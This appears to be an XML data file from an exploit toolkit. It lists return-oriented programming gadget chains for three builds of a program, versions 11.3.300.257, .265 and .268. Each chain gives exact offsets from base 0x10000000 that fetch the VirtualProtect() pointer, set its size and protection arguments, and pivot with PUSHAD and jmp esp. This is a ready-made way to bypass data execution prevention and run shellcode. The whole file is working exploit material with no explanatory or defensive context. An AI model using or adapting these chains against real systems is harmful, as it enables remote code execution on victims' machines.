80 lines
3.1 KiB
XML
80 lines
3.1 KiB
XML
<?xml version="1.0" encoding="ISO-8859-1"?>
|
|
<db>
|
|
<rop>
|
|
<compatibility>
|
|
<target>11.3.300.257</target>
|
|
</compatibility>
|
|
|
|
<gadgets base="0x10000000">
|
|
<gadget offset="0x00243043">POP EAX # RETN</gadget>
|
|
<gadget offset="0x006e3384">ptr to VirtualProtect()</gadget>
|
|
<gadget offset="0x0044a4aa">MOV EAX,DWORD PTR DS:[EAX] # RETN</gadget>
|
|
<gadget offset="0x003d54df">XCHG EAX,ESI # RETN</gadget>
|
|
<gadget offset="0x005f0b25">POP EBP # RETN</gadget>
|
|
<gadget offset="0x002ed0f1">jmp esp</gadget>
|
|
<gadget offset="0x003eb988">POP EBX # RETN</gadget>
|
|
<gadget value="0x00000400">0x00000400-> ebx</gadget>
|
|
<gadget offset="0x00662e60">POP EDX # RETN</gadget>
|
|
<gadget value="0x00000040">0x00000040-> edx</gadget>
|
|
<gadget offset="0x0058289d">POP ECX # RETN</gadget>
|
|
<gadget offset="0x00955ebe">Writable location</gadget>
|
|
<gadget offset="0x00414e84">POP EDI # RETN</gadget>
|
|
<gadget offset="0x004de801">RETN (ROP NOP)</gadget>
|
|
<gadget offset="0x0024044c">POP EAX # RETN</gadget>
|
|
<gadget value="nop">nop</gadget>
|
|
<gadget offset="0x00627674">PUSHAD # RETN</gadget>
|
|
</gadgets>
|
|
</rop>
|
|
|
|
<rop>
|
|
<compatibility>
|
|
<target>11.3.300.265</target>
|
|
</compatibility>
|
|
|
|
<gadgets base="0x10000000">
|
|
<gadget offset="0x00487414">POP EAX # RETN</gadget>
|
|
<gadget offset="0x006e338c">ptr to VirtualProtect()</gadget>
|
|
<gadget offset="0x00437d39">MOV EAX,DWORD PTR DS:[EAX] # RETN</gadget>
|
|
<gadget offset="0x0008f9c6">XCHG EAX,ESI # RETN</gadget>
|
|
<gadget offset="0x000baf77">POP EBP # RETN</gadget>
|
|
<gadget offset="0x002d8d5c">jmp esp</gadget>
|
|
<gadget offset="0x00005604">POP EBX # RETN</gadget>
|
|
<gadget value="0x00000400">0x00000400-> ebx</gadget>
|
|
<gadget offset="0x0064a4d7">POP EDX # RETN</gadget>
|
|
<gadget value="0x00000040">0x00000040-> edx</gadget>
|
|
<gadget offset="0x004087db">POP ECX # RETN</gadget>
|
|
<gadget offset="0x00955197">Writable location</gadget>
|
|
<gadget offset="0x005be57f">POP EDI # RETN</gadget>
|
|
<gadget offset="0x003a0002">RETN (ROP NOP)</gadget>
|
|
<gadget offset="0x00244a82">POP EAX # RETN</gadget>
|
|
<gadget value="nop">nop</gadget>
|
|
<gadget offset="0x004cbc7f">PUSHAD # RETN</gadget>
|
|
</gadgets>
|
|
</rop>
|
|
|
|
<rop>
|
|
<compatibility>
|
|
<target>11.3.300.268</target>
|
|
</compatibility>
|
|
|
|
<gadgets base="0x10000000">
|
|
<gadget offset="0x0012429b">POP ECX # RETN</gadget>
|
|
<gadget offset="0x006e438c">ptr to VirtualProtect()</gadget>
|
|
<gadget offset="0x00481a7d">MOV EAX,DWORD PTR DS:[ECX]</gadget>
|
|
<gadget offset="0x006ae8d7">XCHG EAX,ESI # RETN</gadget>
|
|
<gadget offset="0x000a6b69">POP EBP # RETN</gadget>
|
|
<gadget offset="0x002b95bb">jmp esp</gadget>
|
|
<gadget offset="0x0027f328">POP EBX # RETN</gadget>
|
|
<gadget value="0x00000400">0x00000400-> ebx</gadget>
|
|
<gadget offset="0x00686fe5">POP EDX # RETN</gadget>
|
|
<gadget value="0x00000040">0x00000040-> edx</gadget>
|
|
<gadget offset="0x0017e345">POP ECX # RETN</gadget>
|
|
<gadget offset="0x0092027a">Writable location</gadget>
|
|
<gadget offset="0x002a394a">POP EDI # RETN</gadget>
|
|
<gadget offset="0x00593802"># RETN (ROP NOP)</gadget>
|
|
<gadget offset="0x002447d1">POP EAX # RETN</gadget>
|
|
<gadget value="nop">nop</gadget>
|
|
<gadget offset="0x0062857d">PUSHAD # RETN</gadget>
|
|
</gadgets>
|
|
</rop>
|
|
</db> |